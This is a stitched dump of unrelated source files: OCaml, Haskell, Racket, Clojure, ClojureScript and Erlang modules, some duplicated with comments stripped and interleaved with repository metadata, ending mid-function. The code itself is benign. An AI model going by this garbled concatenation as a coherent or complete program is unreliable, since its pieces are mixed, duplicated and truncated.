data_state -> ?initializing:bool -> exact:bool -> Locations.Zone.t -> Node.t -> data_state
val add_init_state_input :
data_state -> Locations.Zone.t -> Node.t -> data_state
* Kind of ' join ' of the two states
but test before if the new state is included in ~old .
@return ( true , old U new ) if the result is a new state ,
( false , old ) if new is included in old .
but test before if the new state is included in ~old.
@return (true, old U new) if the result is a new state,
(false, old) if new is included in old. *)
val test_and_merge :
old:data_state -> data_state -> bool * data_state
(** @raise Cannot_fold if the state is Top *)
val get_loc_nodes :
data_state -> Locations.Zone.t -> (Node.t * Locations.Zone.t option) list * Locations.Zone.t option
val pretty : Format.formatter -> data_state -> unit
(* ~~~~~~~~~~~~~~~~~~~ *)
type states = data_state Cil_datatype.Stmt.Hashtbl.t
val store_init_state : states -> data_state -> unit
val store_last_state : states -> data_state -> unit
val get_init_state : states -> data_state
val get_stmt_state : states -> Cil_types.stmt -> data_state
val get_last_state : states -> data_state
| null | https://raw.githubusercontent.com/TrustInSoft/tis-interpreter/33132ce4a825494ea48bf2dd6fd03a56b62cc5c3/src/plugins/pdg/pdg_state.mli | ocaml | ************************************************************************
alternatives)
you can redistribute it and/or modify it under the terms of the GNU
It is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
************************************************************************
* Types data_state and Node.t come froms this module
* @raise Cannot_fold if the state is Top
~~~~~~~~~~~~~~~~~~~ | Modified by TrustInSoft
This file is part of Frama - C.
Copyright ( C ) 2007 - 2015
CEA ( Commissariat à l'énergie atomique et aux énergies
Lesser General Public License as published by the Free Software
Foundation , version 2.1 .
See the GNU Lesser General Public License version 2.1
for more details ( enclosed in the file licenses / LGPLv2.1 ) .
exception Cannot_fold
open PdgTypes
val make : PdgTypes.LocInfo.t -> Locations.Zone.t -> data_state
val empty : data_state
val bottom: data_state
val add_loc_node :
data_state -> ?initializing:bool -> exact:bool -> Locations.Zone.t -> Node.t -> data_state
val add_init_state_input :
data_state -> Locations.Zone.t -> Node.t -> data_state
* Kind of ' join ' of the two states
but test before if the new state is included in ~old .
@return ( true , old U new ) if the result is a new state ,
( false , old ) if new is included in old .
but test before if the new state is included in ~old.
@return (true, old U new) if the result is a new state,
(false, old) if new is included in old. *)
val test_and_merge :
old:data_state -> data_state -> bool * data_state
val get_loc_nodes :
data_state -> Locations.Zone.t -> (Node.t * Locations.Zone.t option) list * Locations.Zone.t option
val pretty : Format.formatter -> data_state -> unit
type states = data_state Cil_datatype.Stmt.Hashtbl.t
val store_init_state : states -> data_state -> unit
val store_last_state : states -> data_state -> unit
val get_init_state : states -> data_state
val get_stmt_state : states -> Cil_types.stmt -> data_state
val get_last_state : states -> data_state
|
fe92a7fdd0374d5a8a7c4acb818068ebe6cca57906c4f4246468afe09ba443b6 | eckyputrady/haskell-scotty-realworld-example-app | Types.hs | module Feature.Comment.Types where
import ClassyPrelude
import Feature.User.Types
import Database.PostgreSQL.Simple.FromRow
import Platform.AesonUtil
type CommentId = Integer
type Slug = Text
data Comment = Comment
{ commentId :: CommentId
, commentCreatedAt :: UTCTime
, commentUpdatedAt :: UTCTime
, commentBody :: Text
, commentAuthor :: Profile
} deriving (Eq, Show)
newtype CreateComment = CreateComment
{ createCommentBody :: Text
} deriving (Eq, Show)
data CommentError
= CommentErrorNotFound CommentId
| CommentErrorSlugNotFound Slug
| CommentErrorNotAllowed CommentId
deriving (Eq, Show)
newtype CommentWrapper a = CommentWrapper { commentWrapperComment :: a } deriving (Eq, Show)
newtype CommentsWrapper a = CommentsWrapper { commentsWrapperComments :: [a] } deriving (Eq, Show)
$(commonJSONDeriveMany
[ ''Comment
, ''CreateComment
, ''CommentError
, ''CommentWrapper
, ''CommentsWrapper
])
instance FromRow Comment where
fromRow = Comment
<$> field
<*> field
<*> field
<*> field
<*> fromRow | null | https://raw.githubusercontent.com/eckyputrady/haskell-scotty-realworld-example-app/366a1eec021fb1bfcbc2d8e0485b59cbedba10e5/src/Feature/Comment/Types.hs | haskell | module Feature.Comment.Types where
import ClassyPrelude
import Feature.User.Types
import Database.PostgreSQL.Simple.FromRow
import Platform.AesonUtil
type CommentId = Integer
type Slug = Text
data Comment = Comment
{ commentId :: CommentId
, commentCreatedAt :: UTCTime
, commentUpdatedAt :: UTCTime
, commentBody :: Text
, commentAuthor :: Profile
} deriving (Eq, Show)
newtype CreateComment = CreateComment
{ createCommentBody :: Text
} deriving (Eq, Show)
data CommentError
= CommentErrorNotFound CommentId
| CommentErrorSlugNotFound Slug
| CommentErrorNotAllowed CommentId
deriving (Eq, Show)
newtype CommentWrapper a = CommentWrapper { commentWrapperComment :: a } deriving (Eq, Show)
newtype CommentsWrapper a = CommentsWrapper { commentsWrapperComments :: [a] } deriving (Eq, Show)
$(commonJSONDeriveMany
[ ''Comment
, ''CreateComment
, ''CommentError
, ''CommentWrapper
, ''CommentsWrapper
])
instance FromRow Comment where
fromRow = Comment
<$> field
<*> field
<*> field
<*> field
<*> fromRow | |
f14b09387df899299a8ea34d74a2a9a0e65d3af6740e07f156363c18dfaf9957 | larsen/wiz | Main.hs | module Main where
import Wiz.Types
import Wiz.Environment
import Wiz.Parser
import Wiz.EvalApply
import Text.Parsec (parse)
import Text.Printf
import System.Console.Haskeline
import Data.Maybe (fromMaybe)
import Control.Monad.IO.Class (liftIO)
main :: IO ()
main = do
prg <- loadProgram "init.scm"
env <- runProgram emptyEnv $ fromMaybe (Program []) prg
runInputT defaultSettings (loop env)
where
loop :: Environment -> InputT IO ()
loop env = do
input <- getInputLine "λ> "
case input of
Nothing -> return ()
Just input -> do
let res = parse pForm "(source)" input
case res of
Left err -> do
outputStrLn "Error!"
loop env
Right form -> do
(env', result) <- liftIO $ eval form env
case result of
Just result -> outputStrLn $ printf "%s" (show result)
Nothing -> outputStrLn $ printf "\n"
loop env'
| null | https://raw.githubusercontent.com/larsen/wiz/59b8c5fa5a1bde0a5ed83261599407e2d80efb25/src/Main.hs | haskell | module Main where
import Wiz.Types
import Wiz.Environment
import Wiz.Parser
import Wiz.EvalApply
import Text.Parsec (parse)
import Text.Printf
import System.Console.Haskeline
import Data.Maybe (fromMaybe)
import Control.Monad.IO.Class (liftIO)
main :: IO ()
main = do
prg <- loadProgram "init.scm"
env <- runProgram emptyEnv $ fromMaybe (Program []) prg
runInputT defaultSettings (loop env)
where
loop :: Environment -> InputT IO ()
loop env = do
input <- getInputLine "λ> "
case input of
Nothing -> return ()
Just input -> do
let res = parse pForm "(source)" input
case res of
Left err -> do
outputStrLn "Error!"
loop env
Right form -> do
(env', result) <- liftIO $ eval form env
case result of
Just result -> outputStrLn $ printf "%s" (show result)
Nothing -> outputStrLn $ printf "\n"
loop env'
| |
72e5944053d9e81baf5c117140a3dd72a581d6716e7b4a2f4b3d54dd6a6880e7 | mbutterick/typesetting | hacs-cryptarithmetic.rkt | #lang debug racket
(require "hacs.rkt" sugar/debug)
(module+ test (require rackunit))
(define (word-value d str)
(define xs (for/list ([c (in-string str)])
(dict-ref d (string->symbol (string c)))))
(for/sum ([(x idx) (in-indexed (reverse xs))])
(* x (expt 10 idx))))
(define (math-csp str)
(define input str)
(define words (map string-downcase (string-split input)))
(match-define (list terms ... sum) words)
(define vars (map string->symbol (remove-duplicates (for*/list ([word words]
[c word])
(string c)))))
(unless (<= (length vars) 10)
(raise-argument-error 'too-many-letters))
(define (not= x y) (not (= x y)))
(define math (make-csp))
(add-vars! math vars (range 0 10))
;; all letters have different values
(add-pairwise-constraint! math not= vars)
first letters can not be zero
(define firsts (remove-duplicates (map (compose1 string->symbol string car string->list) words) eq?))
(for ([first firsts])
(add-constraint! math positive? (list first)))
(add-constraint! math (λ args
(define dict (map cons vars args))
(= (apply + (map (λ (w) (word-value dict w)) terms)) (word-value dict sum))) vars)
math)
( solve ( math - csp " TWO TWO FOUR " ) )
#;(solve (math-csp "DUCK DUCK GOOSE"))
#;(solve (math-csp "TICK TICK BOOM"))
#;(solve (math-csp "SEND MORE MONEY"))
( solve ( math - csp " THIS THAT OTHER " ) ) | null | https://raw.githubusercontent.com/mbutterick/typesetting/93a682a1581f3c1564b6f39fc05a5fe1a09a5ccb/csp/csp/hacs-cryptarithmetic.rkt | racket | all letters have different values
(solve (math-csp "DUCK DUCK GOOSE"))
(solve (math-csp "TICK TICK BOOM"))
(solve (math-csp "SEND MORE MONEY")) | #lang debug racket
(require "hacs.rkt" sugar/debug)
(module+ test (require rackunit))
(define (word-value d str)
(define xs (for/list ([c (in-string str)])
(dict-ref d (string->symbol (string c)))))
(for/sum ([(x idx) (in-indexed (reverse xs))])
(* x (expt 10 idx))))
(define (math-csp str)
(define input str)
(define words (map string-downcase (string-split input)))
(match-define (list terms ... sum) words)
(define vars (map string->symbol (remove-duplicates (for*/list ([word words]
[c word])
(string c)))))
(unless (<= (length vars) 10)
(raise-argument-error 'too-many-letters))
(define (not= x y) (not (= x y)))
(define math (make-csp))
(add-vars! math vars (range 0 10))
(add-pairwise-constraint! math not= vars)
first letters can not be zero
(define firsts (remove-duplicates (map (compose1 string->symbol string car string->list) words) eq?))
(for ([first firsts])
(add-constraint! math positive? (list first)))
(add-constraint! math (λ args
(define dict (map cons vars args))
(= (apply + (map (λ (w) (word-value dict w)) terms)) (word-value dict sum))) vars)
math)
( solve ( math - csp " TWO TWO FOUR " ) )
( solve ( math - csp " THIS THAT OTHER " ) ) |
6c57bb817629d18b5e64cfc3865921e72b77ad172325f256e515530bcf44fefc | scrintal/heroicons-reagent | banknotes.cljs | (ns com.scrintal.heroicons.mini.banknotes)
(defn render []
[:svg {:xmlns ""
:viewBox "0 0 20 20"
:fill "currentColor"
:aria-hidden "true"}
[:path {:fillRule "evenodd"
:d "M1 4a1 1 0 011-1h16a1 1 0 011 1v8a1 1 0 01-1 1H2a1 1 0 01-1-1V4zm12 4a3 3 0 11-6 0 3 3 0 016 0zM4 9a1 1 0 100-2 1 1 0 000 2zm13-1a1 1 0 11-2 0 1 1 0 012 0zM1.75 14.5a.75.75 0 000 1.5c4.417 0 8.693.603 12.749 1.73 1.111.309 2.251-.512 2.251-1.696v-.784a.75.75 0 00-1.5 0v.784a.272.272 0 01-.35.25A49.043 49.043 0 001.75 14.5z"
:clipRule "evenodd"}]]) | null | https://raw.githubusercontent.com/scrintal/heroicons-reagent/572f51d2466697ec4d38813663ee2588960365b6/src/com/scrintal/heroicons/mini/banknotes.cljs | clojure | (ns com.scrintal.heroicons.mini.banknotes)
(defn render []
[:svg {:xmlns ""
:viewBox "0 0 20 20"
:fill "currentColor"
:aria-hidden "true"}
[:path {:fillRule "evenodd"
:d "M1 4a1 1 0 011-1h16a1 1 0 011 1v8a1 1 0 01-1 1H2a1 1 0 01-1-1V4zm12 4a3 3 0 11-6 0 3 3 0 016 0zM4 9a1 1 0 100-2 1 1 0 000 2zm13-1a1 1 0 11-2 0 1 1 0 012 0zM1.75 14.5a.75.75 0 000 1.5c4.417 0 8.693.603 12.749 1.73 1.111.309 2.251-.512 2.251-1.696v-.784a.75.75 0 00-1.5 0v.784a.272.272 0 01-.35.25A49.043 49.043 0 001.75 14.5z"
:clipRule "evenodd"}]]) | |
0cd36c0aba0a72559145d0cebb769b28309898791725085fb507076b11b611f4 | jorinvo/letsdo.events | topic.clj | (ns lde.web.pages.topic
(:refer-clojure :exclude [new])
(:require
[hiccup.core :refer [h]]
[reitit.core :refer [match->path]]
[reitit.ring :refer [get-match]]
[lde.web.components :as components]
[lde.web.util :refer [render escape-with-br multipart-image-to-data-uri goto-url]]
[lde.web.pages.event :as event-page]
[lde.core.topic :as topic]
[lde.core.image :as image]
[lde.core.user :as user]
[lde.core.event :as event]
[lde.core.invite :as invite]))
(defn new [req]
(let [path (-> req get-match match->path)]
(render
(:ctx req)
{:title "Setup New Topic"}
[:div
[:h1
"Setup new topic"]
[:form {:action path
:method "post"
:enctype "multipart/form-data"}
[:div.form-field
[:label [:div "Topic name" [:sup " *"]]
[:input.input-field {:type "text"
:name "name"
:required true}]]]
[:div.form-field
[:label [:div "Description"]
[:input.input-field {:type "text"
:name "description"}]]]
(components/image-upload)
[:div.form-field
[:div "Who can see this topic?" [:sup " *"]]
(for [[value {:keys [label]}] topic/visibilities]
[:label.radio
[:input {:type "radio"
:name "visibility"
:required true
:value value}]
label])]
[:div.form-field
[:div "This topic is about" [:sup " *"]]
(for [[value {label :plural}] topic/types]
[:label.radio
[:input {:type "radio"
:name "type"
:required true
:value value}]
label])]
[:button.btn {:type "submit"} "Create Topic"]
[:a.cancel {:href "/"} "Cancel"]]])))
(defn edit [{:keys [topic ctx]}]
(let [url (h (str "/for/" (:topic/slug topic)))]
(render
ctx
{:title (str "Edit Topic: " (h (:topic/name topic)))}
[:div
[:h1
"Edit Topic"]
[:form {:action (str url "/edit")
:method "post"
:enctype "multipart/form-data"}
[:div.form-field
[:label [:div "Topic name" [:sup " *"]]
[:input.input-field {:type "text"
:name "name"
:value (h (:topic/name topic))
:required true}]]]
[:div.form-field
[:label [:div "Description"]
[:input.input-field {:type "text"
:name "description"
:value (h (:topic/description topic))}]]]
(let [image (image/get-by-hash (:topic/image topic) ctx)]
(components/image-upload image))
[:span {} "Who can see this topic? "]
(for [[value {:keys [label]}] topic/visibilities]
[:label.radio
[:input {:type "radio"
:name "visibility"
:required true
:checked (= value (:topic/visibility topic))
:value value}]
label])
[:span {} "This topic is about: "]
(for [[value {label :plural}] topic/types]
[:label.radio
[:input {:type "radio"
:name "type"
:required true
:checked (= value (:topic/type topic))
:value value}]
label])
[:br]
[:button.btn {:type "submit"} "Update Topic"]
" "
[:a.cancel {:href url} "Cancel"]]
[:form {:action (str url "/delete") :method "post"}
[:button.btn.btn-small
{:type "submit"
:data-confirm "Are you sure you want to delete the topic?"}
"Delete Topic"]]])))
(defn overview [{:keys [topic ctx session]
{{:keys [whats]
:or {whats "upcoming"}} :query} :parameters}]
(let [title (:topic/name topic)
topic-url (h (str "/for/" (:topic/slug topic)))
topic-id (:id topic)
user-id (:id session)
events (case whats
"upcoming" (event/upcoming-by-topic topic-id ctx)
"new" (event/latest-by-topic topic-id ctx)
"mine" (event/mine-by-topic topic-id user-id ctx))
user (user/get-by-id ctx user-id)]
(render
ctx
{:title title
:description (str title " - " (:topic/description topic))}
[:div
[:a {:href topic-url}
[:h1 (h (:topic/name topic))]]
(when-let [image (image/get-by-hash (:topic/image topic) ctx)]
[:img.logo {:src (h image)
:alt "logo"}])
[:h2 (h (:topic/description topic))]
(if user
[:nav
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/new"))}
"New " (topic/singular topic)]
(when (topic/admin? ctx (:id topic) (:id user))
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/edit"))}
"Edit Topic"])
(when (topic/admin? ctx (:id topic) (:id user))
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/invites"))}
"Manage Invites"])
[:a.nav-item {:href (goto-url "/logout" topic-url)} "Logout"]]
[:nav
[:a.nav-item {:href (goto-url "/login" topic-url)} "Login"]
[:a.nav-item {:href (goto-url "/signup" topic-url)} "Signup"]])
[:nav
[:a.nav-item.select-item
{:href topic-url
:class (when (= whats "upcoming")
"active")}
(str "Upcoming " (topic/plural topic))]
[:a.nav-item.select-item
{:href (str topic-url "?whats=new")
:class (when (= whats "new")
"active")}
(str "New " (topic/plural topic))]
(when user
[:a.nav-item.select-item
{:href (str topic-url "?whats=mine")
:class (when (= whats "mine")
"active")}
(str "My " (topic/plural topic))])]
[:ul.overview-list (map #(vector :li (event-page/item % topic user ctx))
events)]])))
(defn list-invites [{:keys [topic ctx]}]
(let [title (str "Invites - " (:topic/name topic))
topic-url (h (str "/for/" (:topic/slug topic)))
topic-id (:id topic)
invites (invite/list-by-topic topic-id ctx)]
(render
ctx
{:title title}
[:div
[:a {:href topic-url}
[:h1 (h (:topic/name topic))]]
(when-let [image (image/get-by-hash (:topic/image topic) ctx)]
[:img.logo {:src (h image)
:alt "logo"}])
[:h2 "Invites"]
[:nav
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic)))}
"All " (topic/plural topic)]
[:a.nav-item {:href (goto-url "/logout" topic-url)} "Logout"]]
[:form {:action (str topic-url "/invites") :method "post"}
[:div.form-field
[:label
[:div "Email" [:sup " *"]]
[:input.input-field {:type "email"
:name "email"
:required true}]]]
[:button.btn
{:type "submit"}
"Invite"]]
[:ul (for [invite invites]
[:li
(:invite/email invite)
[:form.inline {:action (str topic-url "/invites/" (:id invite) "/delete") :method "post"}
[:button.btn.btn-small
{:type "submit"}
"Revoke"]]])]])))
| null | https://raw.githubusercontent.com/jorinvo/letsdo.events/4cd2a5d401d37524c0bac265f48923ab5f91b220/src/lde/web/pages/topic.clj | clojure | (ns lde.web.pages.topic
(:refer-clojure :exclude [new])
(:require
[hiccup.core :refer [h]]
[reitit.core :refer [match->path]]
[reitit.ring :refer [get-match]]
[lde.web.components :as components]
[lde.web.util :refer [render escape-with-br multipart-image-to-data-uri goto-url]]
[lde.web.pages.event :as event-page]
[lde.core.topic :as topic]
[lde.core.image :as image]
[lde.core.user :as user]
[lde.core.event :as event]
[lde.core.invite :as invite]))
(defn new [req]
(let [path (-> req get-match match->path)]
(render
(:ctx req)
{:title "Setup New Topic"}
[:div
[:h1
"Setup new topic"]
[:form {:action path
:method "post"
:enctype "multipart/form-data"}
[:div.form-field
[:label [:div "Topic name" [:sup " *"]]
[:input.input-field {:type "text"
:name "name"
:required true}]]]
[:div.form-field
[:label [:div "Description"]
[:input.input-field {:type "text"
:name "description"}]]]
(components/image-upload)
[:div.form-field
[:div "Who can see this topic?" [:sup " *"]]
(for [[value {:keys [label]}] topic/visibilities]
[:label.radio
[:input {:type "radio"
:name "visibility"
:required true
:value value}]
label])]
[:div.form-field
[:div "This topic is about" [:sup " *"]]
(for [[value {label :plural}] topic/types]
[:label.radio
[:input {:type "radio"
:name "type"
:required true
:value value}]
label])]
[:button.btn {:type "submit"} "Create Topic"]
[:a.cancel {:href "/"} "Cancel"]]])))
(defn edit [{:keys [topic ctx]}]
(let [url (h (str "/for/" (:topic/slug topic)))]
(render
ctx
{:title (str "Edit Topic: " (h (:topic/name topic)))}
[:div
[:h1
"Edit Topic"]
[:form {:action (str url "/edit")
:method "post"
:enctype "multipart/form-data"}
[:div.form-field
[:label [:div "Topic name" [:sup " *"]]
[:input.input-field {:type "text"
:name "name"
:value (h (:topic/name topic))
:required true}]]]
[:div.form-field
[:label [:div "Description"]
[:input.input-field {:type "text"
:name "description"
:value (h (:topic/description topic))}]]]
(let [image (image/get-by-hash (:topic/image topic) ctx)]
(components/image-upload image))
[:span {} "Who can see this topic? "]
(for [[value {:keys [label]}] topic/visibilities]
[:label.radio
[:input {:type "radio"
:name "visibility"
:required true
:checked (= value (:topic/visibility topic))
:value value}]
label])
[:span {} "This topic is about: "]
(for [[value {label :plural}] topic/types]
[:label.radio
[:input {:type "radio"
:name "type"
:required true
:checked (= value (:topic/type topic))
:value value}]
label])
[:br]
[:button.btn {:type "submit"} "Update Topic"]
" "
[:a.cancel {:href url} "Cancel"]]
[:form {:action (str url "/delete") :method "post"}
[:button.btn.btn-small
{:type "submit"
:data-confirm "Are you sure you want to delete the topic?"}
"Delete Topic"]]])))
(defn overview [{:keys [topic ctx session]
{{:keys [whats]
:or {whats "upcoming"}} :query} :parameters}]
(let [title (:topic/name topic)
topic-url (h (str "/for/" (:topic/slug topic)))
topic-id (:id topic)
user-id (:id session)
events (case whats
"upcoming" (event/upcoming-by-topic topic-id ctx)
"new" (event/latest-by-topic topic-id ctx)
"mine" (event/mine-by-topic topic-id user-id ctx))
user (user/get-by-id ctx user-id)]
(render
ctx
{:title title
:description (str title " - " (:topic/description topic))}
[:div
[:a {:href topic-url}
[:h1 (h (:topic/name topic))]]
(when-let [image (image/get-by-hash (:topic/image topic) ctx)]
[:img.logo {:src (h image)
:alt "logo"}])
[:h2 (h (:topic/description topic))]
(if user
[:nav
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/new"))}
"New " (topic/singular topic)]
(when (topic/admin? ctx (:id topic) (:id user))
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/edit"))}
"Edit Topic"])
(when (topic/admin? ctx (:id topic) (:id user))
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic) "/invites"))}
"Manage Invites"])
[:a.nav-item {:href (goto-url "/logout" topic-url)} "Logout"]]
[:nav
[:a.nav-item {:href (goto-url "/login" topic-url)} "Login"]
[:a.nav-item {:href (goto-url "/signup" topic-url)} "Signup"]])
[:nav
[:a.nav-item.select-item
{:href topic-url
:class (when (= whats "upcoming")
"active")}
(str "Upcoming " (topic/plural topic))]
[:a.nav-item.select-item
{:href (str topic-url "?whats=new")
:class (when (= whats "new")
"active")}
(str "New " (topic/plural topic))]
(when user
[:a.nav-item.select-item
{:href (str topic-url "?whats=mine")
:class (when (= whats "mine")
"active")}
(str "My " (topic/plural topic))])]
[:ul.overview-list (map #(vector :li (event-page/item % topic user ctx))
events)]])))
(defn list-invites [{:keys [topic ctx]}]
(let [title (str "Invites - " (:topic/name topic))
topic-url (h (str "/for/" (:topic/slug topic)))
topic-id (:id topic)
invites (invite/list-by-topic topic-id ctx)]
(render
ctx
{:title title}
[:div
[:a {:href topic-url}
[:h1 (h (:topic/name topic))]]
(when-let [image (image/get-by-hash (:topic/image topic) ctx)]
[:img.logo {:src (h image)
:alt "logo"}])
[:h2 "Invites"]
[:nav
[:a.nav-item {:href (h (str "/for/" (:topic/slug topic)))}
"All " (topic/plural topic)]
[:a.nav-item {:href (goto-url "/logout" topic-url)} "Logout"]]
[:form {:action (str topic-url "/invites") :method "post"}
[:div.form-field
[:label
[:div "Email" [:sup " *"]]
[:input.input-field {:type "email"
:name "email"
:required true}]]]
[:button.btn
{:type "submit"}
"Invite"]]
[:ul (for [invite invites]
[:li
(:invite/email invite)
[:form.inline {:action (str topic-url "/invites/" (:id invite) "/delete") :method "post"}
[:button.btn.btn-small
{:type "submit"}
"Revoke"]]])]])))
| |
513ac0fe55ee9ca79b6cbb49aa422b70586260d1f33a02a10500a45e7142e2d7 | ninenines/cowboy | charset_in_content_types_provided_h.erl | %% This module has a media type provided with an explicit charset.
-module(charset_in_content_types_provided_h).
-export([init/2]).
-export([content_types_provided/2]).
-export([charsets_provided/2]).
-export([get_text_plain/2]).
init(Req, Opts) ->
{cowboy_rest, Req, Opts}.
content_types_provided(Req, State) ->
{[
{{<<"text">>, <<"plain">>, [{<<"charset">>, <<"utf-8">>}]}, get_text_plain}
], Req, State}.
charsets_provided(Req, State) ->
{[<<"utf-16">>, <<"iso-8861-1">>], Req, State}.
get_text_plain(Req, State) ->
{<<"This is REST!">>, Req, State}.
| null | https://raw.githubusercontent.com/ninenines/cowboy/8795233c57f1f472781a22ffbf186ce38cc5b049/test/handlers/charset_in_content_types_provided_h.erl | erlang | This module has a media type provided with an explicit charset. |
-module(charset_in_content_types_provided_h).
-export([init/2]).
-export([content_types_provided/2]).
-export([charsets_provided/2]).
-export([get_text_plain/2]).
init(Req, Opts) ->
{cowboy_rest, Req, Opts}.
content_types_provided(Req, State) ->
{[
{{<<"text">>, <<"plain">>, [{<<"charset">>, <<"utf-8">>}]}, get_text_plain}
], Req, State}.
charsets_provided(Req, State) ->
{[<<"utf-16">>, <<"iso-8861-1">>], Req, State}.
get_text_plain(Req, State) ->
{<<"This is REST!">>, Req, State}.
|
98e5d6ad0f16289f414f0e2956a32c9562dd6e585a2762c5424536f9ffaf7278 | flybot-sg/lasagna-pull | option.cljc | Copyright 2022 , Flybot Pte . Ltd.
Apache License 2.0 , /
(ns sg.flybot.pullable.core.option
"support for decorate query options"
(:require [sg.flybot.pullable.util :as u :refer [data-error]]))
(defmulti apply-post
"create a post processor by ::pp-type, returns a function takes
k-v pair, returns the same shape of data"
:proc/type)
(defn assert-arg!
"An error that represent apply-post illegal argument."
[pred arg]
(when-not (pred (:proc/val arg))
(throw (ex-info "illegal argument" arg))))
(defmethod apply-post :default
[arg]
(assert-arg! (constantly false) arg))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
)
# # # : when option
;; Takes a pred function as its argument (:proc/val)
;; when the return value not fullfil `pred`, it is not included in result.
(defmethod apply-post :when
[arg]
(let [{pred :proc/val} arg]
(assert-arg! fn? arg)
(fn [[k v]]
[k (when (pred v) v)])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
;;when everything ok, it returns the original data
= > [: a 1 ]
((apply-post {:proc/type :when :proc/val odd?}) [:a 0]) ;=> [:a nil]
)
# # # : not - found option
;; Takes any value as its argument (:proc/val)
;; When a value not found, it gets replaced by not-found value
(defmethod apply-post :not-found
[{:proc/keys [val]}]
(fn [[k v]]
[k (or v val)]))
^:rct/test
(comment
= > [: a 1 ]
((apply-post {:proc/type :not-found :proc/val :default}) [:a nil]) ;=> [:a :default]
)
# # # : with option
;; Takes a vector of args as this option's argument (:proc/val)
;; Requires value being a function, it applies the vector of args to it,
;; returns the return value as query result.
(defmethod apply-post :with
[arg]
(let [{args :proc/val} arg]
(assert-arg! vector? arg)
(fn [[k f]]
[k (if (fn? f)
(apply f args)
(data-error f k "value must be a function"))])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
((apply-post {:proc/type :with :proc/val [3]}) [:a 3]) ;=>> [:a u/error?]
= > [: a 4 ]
)
# # # : batch option
;; Takes a vector of vector of args as this options's argument.
only for function value .
;; query result will have a value of a vector of applying resturn value.
(defmethod apply-post :batch
[arg]
(assert-arg! #(and (vector? %) (every? vector? %)) arg)
(let [{args-vec :proc/val} arg]
(fn [[k f]]
[k (if-not (fn? f)
(data-error f k "value must be a function")
(map #(apply f %) args-vec))])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
= > [: a [ 4 5 ] ]
((apply-post {:proc/type :batch :proc/val [[3] [4]]}) [:a 3]) ;=>> [:a u/error?]
)
# # # : seq option ( Pagination )
;; Takes a pair of numbers as this option's argument.
from : number ] [: count : number ] ]
Appliable only for seq query .
;; query result has a value of a sequence of truncated sequence.
(defmethod apply-post :seq
[arg]
(assert-arg! vector? arg)
(let [[from cnt] (:proc/val arg)
from (or from 0)
cnt (or cnt 0)]
(fn [[k v]]
[k (if-not (seqable? v)
(data-error v k "seq option can only be used on sequences")
(->> v (drop from) (take cnt)))])))
^:rct/test
(comment
((apply-post {:proc/type :seq :proc/val 3}) [:a inc]) ;throws=>> {:error/message #"illegal argument"}
((apply-post {:proc/type :seq :proc/val [1 3]}) [:a (range 8)]) ;=> [:a [1 2 3]]
((apply-post {:proc/type :seq :proc/val [1 3]}) [:a 1]) ;=>> [:a u/error?]
)
# # # : watch option
;; Takes an function as the argument (:proc/val):
;; [:=> [:catn [:old-value :any] [:new-value :any]] :any]
;; returns `nil` when your do want to watch it anymore.
;; Can watch on a IRef value
(def watchable?
"pred if `x` is watchable"
(fn [x]
#?(:clj (instance? clojure.lang.IRef x)
:cljs (satisfies? IDeref x))))
(defmethod apply-post :watch
[arg]
(assert-arg! fn? arg)
(let [f (:proc/val arg)
w-k ::watch
watcher (fn [_ watched old-value new-value]
(when (nil? (f old-value new-value))
(remove-watch watched w-k)))]
(fn [[k v]]
(if (watchable? v)
(do (add-watch v w-k watcher)
[k @v])
[k (data-error v k "watch option can only apply to an watchable value")]))))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
((apply-post {:proc/type :watch :proc/val identity}) [:a inc]) ;=>> [:a u/error?]
(def a (atom 0))
(def b (atom 0))
((apply-post {:proc/type :watch :proc/val (fn [_ v] (reset! b v))}) [:a a]);=> [:a 0]
(reset! a 5)
= > 5
) | null | https://raw.githubusercontent.com/flybot-sg/lasagna-pull/b163e44fe47414040f54782a1787a6d0ba2a2b00/src/sg/flybot/pullable/core/option.cljc | clojure | Takes a pred function as its argument (:proc/val)
when the return value not fullfil `pred`, it is not included in result.
when everything ok, it returns the original data
=> [:a nil]
Takes any value as its argument (:proc/val)
When a value not found, it gets replaced by not-found value
=> [:a :default]
Takes a vector of args as this option's argument (:proc/val)
Requires value being a function, it applies the vector of args to it,
returns the return value as query result.
=>> [:a u/error?]
Takes a vector of vector of args as this options's argument.
query result will have a value of a vector of applying resturn value.
=>> [:a u/error?]
Takes a pair of numbers as this option's argument.
query result has a value of a sequence of truncated sequence.
throws=>> {:error/message #"illegal argument"}
=> [:a [1 2 3]]
=>> [:a u/error?]
Takes an function as the argument (:proc/val):
[:=> [:catn [:old-value :any] [:new-value :any]] :any]
returns `nil` when your do want to watch it anymore.
Can watch on a IRef value
=>> [:a u/error?]
=> [:a 0] | Copyright 2022 , Flybot Pte . Ltd.
Apache License 2.0 , /
(ns sg.flybot.pullable.core.option
"support for decorate query options"
(:require [sg.flybot.pullable.util :as u :refer [data-error]]))
(defmulti apply-post
"create a post processor by ::pp-type, returns a function takes
k-v pair, returns the same shape of data"
:proc/type)
(defn assert-arg!
"An error that represent apply-post illegal argument."
[pred arg]
(when-not (pred (:proc/val arg))
(throw (ex-info "illegal argument" arg))))
(defmethod apply-post :default
[arg]
(assert-arg! (constantly false) arg))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
)
# # # : when option
(defmethod apply-post :when
[arg]
(let [{pred :proc/val} arg]
(assert-arg! fn? arg)
(fn [[k v]]
[k (when (pred v) v)])))
^:rct/test
(comment
throws= > > { : error / class clojure.lang . ExceptionInfo }
= > [: a 1 ]
)
# # # : not - found option
(defmethod apply-post :not-found
[{:proc/keys [val]}]
(fn [[k v]]
[k (or v val)]))
^:rct/test
(comment
= > [: a 1 ]
)
# # # : with option
(defmethod apply-post :with
[arg]
